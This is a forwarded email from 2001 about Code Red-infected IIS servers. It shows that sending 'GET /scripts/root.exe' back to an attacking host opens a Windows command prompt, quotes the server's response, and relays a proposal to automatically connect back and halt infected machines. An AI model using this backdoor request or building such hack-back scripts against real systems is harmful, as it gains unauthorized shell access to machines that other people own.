FW: Careful. This is for information only.
I don't recommend doing this, but here is a forwarded message
------------ Forwarded Message
------------------------------------------
According to incidents.org, for any machine that hits your webserver
with
XXXXX, you can telnet back to that machine on port 80 and get cmd line
access to that machine:
>> I tried telneting back to a server that had sent the
/default.ida?XXX...
>> Results:
>>
>>
>> -----------------------------------------------------
>> GET /scripts/root.exe HTTP/1.0
>>
>> HTTP/1.1 200 OK
>> Server: Microsoft-IIS/5.0
>> Date: Sat, 04 Aug 2001 20:35:19 GMT
>> Content-Type: application/octet-stream
>> Microsoft Windows 2000 [Version 5.00.2195]
>> (C) Copyright 1985-1999 Microsoft Corp.
>>
>> c:\inetpub\scripts>
>> -----------------------------------------------------
Amazing! Someone on /. proposed writing a script that whenever anyone
hits
your web server with XXXX, you automatically connect back and halt the
attacking machine, thus stopping the spread.
------------------------------------------------------------------------
-
Reply to: